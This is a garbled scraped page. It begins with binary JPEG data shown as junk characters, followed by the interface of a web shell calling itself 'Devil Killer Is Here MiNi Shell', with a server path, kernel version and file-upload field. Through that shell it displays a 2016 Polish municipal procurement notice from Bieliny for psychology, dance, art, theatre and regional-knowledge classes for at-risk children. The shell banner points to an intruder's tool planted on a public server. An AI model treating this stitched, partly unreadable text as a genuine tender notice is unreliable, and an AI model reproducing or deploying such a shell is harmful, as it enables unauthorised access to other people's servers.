JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161116/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161116/344602-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='www.bieliny.biuletyn.net' target='_blank'>www.bieliny.biuletyn.net</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 344602 - 2016
              z dnia 2016-11-16 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Bieliny: Wykonywanie usług edukacyjnych i psychologicznych  w ramach projektu pn.: Bielińskie stacje wsparcia<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                tak
              </div><br /><b>Nazwa projektu lub programu</b><br />Projekt pn.: Bielińskie stacje wsparcia jest współfinansowany ze środków Regionalnego Programu Operacyjnego Województwa Świętokrzyskiego na lata 2014  2020 w ramach Europejskiego Funduszu Społecznego </div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Bieliny, krajowy numer identyfikacyjny
              , ul.
              ul. Partyzantów 
              17,
              26004  
              Bieliny, woj.
              świętokrzyskie, państwo
              Polska, tel.
              , e-mail
              , faks
              413 026 107.
              <br />
              Adres strony internetowej (URL): www.bieliny.biuletyn.net<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.bieliny.biuletyn.net</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.bieliny.biuletyn.net</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />osobiście, pocztą lub kurierem  Urząd Gminy Bieliny , ul. Partyzantów 17, 26 - 004 Bieliny, (pokój nr 14 - sekretariat) <br />
                Adres:
                <br />Urząd Gminy Bieliny , ul. Partyzantów 17, 26 - 004 Bieliny, (pokój nr 14 - sekretariat) </div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Wykonywanie usług edukacyjnych i psychologicznych  w ramach projektu pn.: Bielińskie stacje wsparcia<br /><b>Numer referencyjny: </b>ZP 271.14.2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>. Zamawiający podzielił zamówienie na pięć części:
Część 1 ) Usługa psychologiczna  pełnienie dyżuru przez psychologa (średnio 6h/mcs. w każdej z sześciu  Stacji  Wsparcia, ale może zaistnieć potrzeba zrealizowania innej ilości godzin w danym miesiącu. Łącznie na cały okres realizacji zamówienia 432 godz.)
Część 2) Usługa edukacyjna  prowadzenie zajęć  rytmicznych  Step - up lub zumba (średnio 4h/msc.  w każdej z sześciu  Stacji  Wsparcia,  ale może zaistnieć potrzeba zrealizowania innej ilości godzin w danym miesiącu. Łącznie na cały okres realizacji zamówienia 288 godz.)
Część 3) Usługa edukacyjna  prowadzenie zajęć  plastyczno  rękodzielniczych  Świat wyobraźni  (średnio 4 h  w każdej z sześciu  Stacji  Wsparcia, ale może zaistnieć potrzeba zrealizowania innej ilości godzin w danym miesiącu. Łącznie na cały okres realizacji zamówienia  288 godz.).
Część 4) Usługa edukacyjna  prowadzenie zajęć  z zakresu  animacji  kulturalnej/ teatralnej Na scenie marzeń z elementami prawidłowej wymowy i dykcji (średnio 4h  w każdej z sześciu  Stacji  Wsparcia, ale może zaistnieć potrzeba zrealizowania innej ilości godzin w danym miesiącu. Łącznie na cały okres realizacji zamówienia 288 godz.). 
Część 5) Usługa edukacyjna  prowadzenie zajęć   w zakresie  wiedzy  o regionie  Moja  mała Ojczyzna średnio 4h  w każdej z sześciu  Stacji  Wsparcia, ale może zaistnieć potrzeba zrealizowania innej ilości godzin w danym miesiącu. Łącznie na cały okres realizacji zamówienia 288 godz. Może zaistnieć konieczność prowadzenia zajęć w terenie.
W ramach każdej z części  Wykonawca zobowiązany jest do zapoznania się z przedmiotem zamówienia i  wykonywania usługi zgodnie z poniższymi zapisami siwz:
1)	Przedmiotem zamówienia jest usługa polegająca na wykonywaniu usług w sześciu placówkach wsparcia dziennego na terenie gminy Bieliny w miejscowościach: Bieliny, Huta Podłysica, Huta Nowa, Porąbki, Lechów, Napęków. Wsparciem  w ramach projektu  zostanie objętych 15 osób (dzieci i młodzieży do 18 r. życia raz ok w każdej ze Stacji Wsparcia. Uczestnikami zajęć będą objęte osoby zagrożone ubóstwem i  wykluczeniem  społecznym. Uczestnikami będą dzieci i młodzież ze szkół podstawowych. gimnazjum i szkół ponadgimnazjalnych, którzy mają problem z nauką,  wywodzą się z rodzin dysfunkcyjnych. Zajęcia stanowiące przedmiot zamówienia będą miały na celu:  wspomaganie  ich  w zakresie edukacyjnym, opiekuńczym i wychowawczym, organizację spędzenia czasu w atrakcyjny sposób, wygenerować nowe możliwości  rozwoju  pasje i  zainteresowania. Zamawiający nie wyklucza  udziału w zajęciach  osób z niepełnosprawnościami.  
2)	Wykonawca usługi zapewni wykwalifikowaną kadrę do prowadzenia zajęć opisanych w każdej z pięciu części zamówienia. Usługa winna być prowadzona  na najwyższym poziomie, w sposób sumienny i staranny, według  objętych  umową  na najwyższym poziomie, w sposób  sumienny i staranny, według powszechnie obowiązujących  standardów  i norm  w zakresie prowadzenia zajęć edukacyjnych i psychologicznych dla dzieci i młodzieży. 
3)	Wykonawca przed podpisaniem umowy zapozna się  z wnioskiem aplikacyjnym  o dofinansowanie projektu,  umowa o dofinansowanie, wytycznymi programowymi oraz zobowiązuje się do przestrzegania postanowień wynikających z wymienionych  w niniejszym  ustępie dokumentów, w związku z czym zobowiązany jest  m.in. do: udzielenia wszelkich informacji niezbędnych Zamawiającemu do promocji  związanej  z realizacją projektu.
4)	Wykonawcy ustalą terminy prowadzenia zajęć z osobami prowadzącymi stacje wsparcia. Harmonogram  terminów zajęć w pierwszym semestrze roku szkolnego 2016/2017 zostanie dostarczony zamawiającemu w ciągu 2 dni od podpisania umowy. Harmonogram  dostarczony zamawiającemu podlega  zatwierdzeniu przez kierownika projektu Bielińskie stacje wsparcia. Kolejne harmonogramy będą ustalone minimum 7 dni przed rozpoczęciem  danego semestru. 
5)	Usługi będą  realizowane w  placówkach stacji wsparcia w dniach  i godzinach ustalonych z kierownikiem projektu Bielińskie stacje wsparcia i osobami prowadzącymi  stacje wsparcia.
6)	Poszczególne placówki Stacji Wsparcia znajdują się w :
1.Budynku Ochotniczej Straży Pożarnej w Lechowie,
2. Szkoły Podstawowej w Hucie Podłysicy, 
3. Szkoły Podstawowej w Hucie Nowej, 
4. Szkoły Podstawowej w Porąbkach, 
5. Świetlicy Wiejskiej w Napękowie, 
6. Zespole Szkół Samorządowych w Bielinach,
7)	Wykonawca ponosi pełną odpowiedzialność za  bezpieczeństwo  uczniów  w czasie  trwania zajęć,  ponadto zobowiązany jest do:
dla Część 1:
a)	Prowadzenia kart obserwacji raportów z przeprowadzonych spotkań 
b)	Sprawowania opieki nad osobami uczestniczącymi w zajęciach. 
c)	Poddać  się kontroli  Zamawiającego  oraz Instytucji  Pośredniczącej. 
dla Część 2,3,4,5:
a)	Opracowania scenariuszy (programu zajęć  )odwołujących się do  treści programu nauczania realizowanego w ramach prowadzonych zajęć.
b)	 Dostosowania form i metod nauczania do możliwości osób uczestniczących w zajęciach.
c)	 Sprawowania opieki nad osobami uczestniczącymi w zajęciach. 
d)	 Poddać  się kontroli  Zamawiającego  oraz Instytucji  Pośredniczącej. 
8)	Wykonawca  zobowiązany  jest  do sporządzenia  i oddania Zamawiającemu  po każdych zajęciach  w danej grupie, następujących  dokumentów:
a)	Listę obecności uczestników, 
b)	Dziennik zajęć  zawierający m. in. Wymiar  godzin  i tematy  zajęć edukacyjnych,
c)	Inne dokumenty  zlecone przez zamawiającego.
9)	Wykonawca wyraża zgodę na wykorzystanie wypracowanych materiałów  stworzonych w trakcie  i po zakończeniu  realizacji  przedmiotu zamówienia  do innych działań  Zamawiającego. 
10)	Wykonawca, zobowiązany będzie  do niezwłocznego  poinformowania  Zamawiającego o:
a)	Nie zgłoszenie się uczestników  na zajęcia, 
b)	Przerwaniu lub rezygnacji  z uczestnictwa oraz każdorazowej  nieobecności  uczestników  zajęć, 
c)	Innych sytuacjach, które  mają wpływ  na realizację  programu  zajęć i umowy.
11)	Wykonawca zobowiązany będzie do przekazania Zamawiającemu, na zakończenie każdego miesiąca, w którym odbyły się zajęcia  następujących  dokumentów:
a)	Faktury /Rachunku za prowadzoną  usługę.
b)	Innej dokumentacji  niezbędnej  do realizacji  zajęć dokumentów zawartych w punkcie  7 i 8. 
12)	Wykonawca będzie musiał w razie potrzeby uczestniczyć w różnych imprezach okolicznościowych i tematycznych (może zaistnieć potrzeba uczestniczenia w zajęciach wyjazdowych  poza terenem placówki wsparcia).

<br /><br /><b>II.5) Główny kod CPV: </b>80000000-4<br /><b> Dodatkowe kody CPV:</b>85121270-6,
                80410000-1<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              397112.21<br />
              Waluta:
              <br /><div style="padding-left: 20px">PLN<br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 30/09/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie precyzuje wymagań w tym zakresie. Warunek ten będzie oceniony na podstawie oświadczenia dołączonego do oferty wykonawcy stanowiącego załącznik nr 2 (Oświadczenie wykonawcy dotyczące spełnienia warunków udziału w postępowaniu). <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie precyzuje wymagań w tym zakresie.
Warunek ten będzie oceniony na podstawie oświadczenia dołączonego do oferty wykonawcy stanowiącego załącznik nr 2 (Oświadczenie wykonawcy dotyczące spełnienia  warunków udziału  w postępowaniu). 
<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                     Osoby skierowane  przez wykonawcę od realizacji zadania;
Warunek Zamawiający uzna za spełniony jeżeli Wykonawca wykaże, iż dysponuje n/w osobami: 
Część 1  co najmniej jedną osobą  posiadającą:
	kwalifikacje do prowadzenia usług psychologicznych zgodnie z ustawą  z dnia 8 czerwca 2001 r. o zawodzie psychologa i samorządzie zawodowym psychologów tj. posiada  ukończone studia magisterskie na kierunku psychologia 
oraz
	doświadczenie zawodowe w wykonywaniu zawodu psychologa  w myśl ustawy z dnia 8 czerwca 2001 r. o zawodzie psychologa i samorządzie zawodowym psychologów - minimum 12 miesiące  doświadczenie zawodowe stanowi kryterium oceny ofert  i zamawiający szczegółowo  określa wymagania w rozdziale 17 pkt 17.1 dla części 1 -  kryterium oceny ofert  minimum doświadczenia osoby to 12  miesięcy 
oraz
	doświadczenie zawodowe w zakresie pomocy społecznej lub pieczy zastępczej  minimum 12 msc.  doświadczenie zawodowe w zakresie pomocy społecznej lub pieczy zastępczej stanowi kryterium oceny ofert  i zamawiający szczegółowo  określa wymagania w rozdziale 17 pkt 17.1 dla części 1 -  kryterium oceny ofert  minimum doświadczenia osób w tym zakresie to 12 miesięcy 
Część 2 - co najmniej jedną osobą  posiadającą:
	doświadczenie zawodowe tj.: doświadczenie w prowadzeniu zajęć  z rytmiki Step up lub zumba lub innych zajęć tego typu np.: wychowania fizycznego lub fitnes lub tańca minimum 12 miesięcy -  doświadczenie zawodowe stanowi kryterium oceny ofert  i zamawiający szczegółowo  określa wymagania w rozdziale 17 pkt 17.1 dla części 2 -  kryterium oceny ofert  minimum doświadczenia osoby to 12 miesięcy oraz
	kwalifikacje do prowadzenia  zajęć  z rytmiki Step up lub zumba lub innych zajęć tego typu np.: wychowania fizycznego lub fitnes lub tańca - tj.:
     - posiadającą wykształcenie wyższe kierunkowe uprawniające do prowadzenia zajęć z rytmiki Step up lub zumba lub innych zajęć tego typu np.: wychowania fizycznego lub fitnes lub tańca u oraz posiadającą przygotowanie  pedagogiczne
    lub
   - posiada wykształcenie wyższe i  studia podyplomowe lub  kursy, szkolenia itp.  w zakresie umożliwiającym prowadzenie zajęć z rytmiki Step up lub zumba lub innych zajęć tego typu np.: wychowania fizycznego lub fitnes lub tańca oraz posiadająca przygotowanie  pedagogiczne
            Część 3 co najmniej jedną osobą  posiadającą:
	doświadczenie zawodowe tj.: doświadczenie w prowadzeniu zajęć  plastycznych lub rękodzielniczych lub innych zajęć tego typu np.: zajęć z techniki lub artystycznych minimum 12 miesięcy-  doświadczenie zawodowe stanowi kryterium oceny ofert  i zamawiający szczegółowo  określa wymagania w rozdziale 17 pkt 17.1 dla części 3 -  kryterium oceny ofert  minimum doświadczenia osoby to 12 miesięcy 
oraz
	kwalifikacje  do prowadzenia  zajęć  plastycznych lub rękodzielniczych lub innych zajęć tego typu np.: zajęć z techniki lub artystycznych tj. :
- posiadającą wykształcenie wyższe kierunkowe uprawniające do prowadzenia  zajęć  plastycznych lub rękodzielniczych lub innych zajęć tego typu np.: zajęć z techniki, plastyki lub artystycznych oraz posiadającą przygotowanie  pedagogiczne
lub
- posiada wykształcenie wyższe i  studia podyplomowe lub  kursy, szkolenia itp. w zakresie umożliwiającym prowadzenie zajęć  plastycznych lub rękodzielniczych lub innych zajęć tego typu (np.: zajęć z techniki, plastyki lub artystycznych) oraz posiadającą przygotowanie  pedagogiczne.
Część 4 co najmniej jedną osobą  posiadającą:
	doświadczenie zawodowe tj.: doświadczenie w prowadzeniu zajęć z animacji kulturalnej/teatralnych lub innych zajęć tego typu np.: języka polskiego  minimum 12 miesięcy - doświadczenie zawodowe stanowi kryterium oceny ofert  i zamawiający szczegółowo  określa wymagania w rozdziale 17 pkt 17.1 dla części 4 -  kryterium oceny ofert  minimum doświadczenia osoby to 12 miesięcy oraz
	kwalifikacje  do prowadzenia  zajęć  z animacji kulturalnej/teatralnych  lub innych zajęć tego typu np.:  języka polskiego - tj. :
- posiadającą wykształcenie wyższe kierunkowe uprawniające do prowadzenia    zajęć  z animacji kulturalnej/teatralnych  lub innych zajęć tego typu np.:  języka polskiego oraz posiadającą przygotowanie  pedagogiczne
  lub
- posiada wykształcenie wyższe i  studia podyplomowe lub  kursy, szkolenia itp.  w zakresie umożliwiającym prowadzenie zajęć z animacji kulturalnej/teatralnych  lub innych zajęć tego typu np.:  języka polskiego oraz posiadającą przygotowanie  pedagogiczne. 
Część 5 co najmniej jedną osobą  posiadającą:
	doświadczenie zawodowe tj.: doświadczenie w prowadzeniu zajęć z  wiedzy o regionie lub innych zajęć tego typu)  minimum 12 miesięcy - doświadczenie zawodowe stanowi kryterium oceny ofert  i zamawiający szczegółowo  określa wymagania w rozdziale 17 pkt 17.1 dla części 5 -  kryterium oceny ofert  minimum doświadczenia osoby to 12 miesięcy 
oraz
	 kwalifikacje  do prowadzenia  zajęć  z   wiedzy o regionie lub innych zajęć tego typu np.: historii, geografii - tj. :
   - posiadającą wykształcenie wyższe oraz posiadającą przygotowanie  pedagogiczne
  oraz
	 posiada uprawnienia przewodnika turystycznego na obszarze Województwa Świętokrzyskiego.
Uwaga! Doświadczenie osoby dla każdej z części będzie liczone od momentu uzyskania uprawnień  w wykonywania zawodu. Np.: jeżeli osoba będzie posiadać doświadczenie np.:  5 miesięcy następnie przerwa w wykonywaniu zawodu i kolejne 7 msc. Pracy to zamawiający  uzna to doświadczenie jako (12 miesięcy) spełniające wymagania siwz. Do doświadczenia zamawiający liczy pełny miesiąc (np.,: od 7 maja do 6 czerwca) pracy osoby skierowanej do wykonania zmówienia.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                doświadczenie zawodowe stanowi kryterium oceny ofert  i zamawiający szczegółowo  określa wymagania w rozdziale 17 pkt 17.1 dla każdej z części </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia na podstawie art. 24 ust. 5 pkt. 1 ustawy; </div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
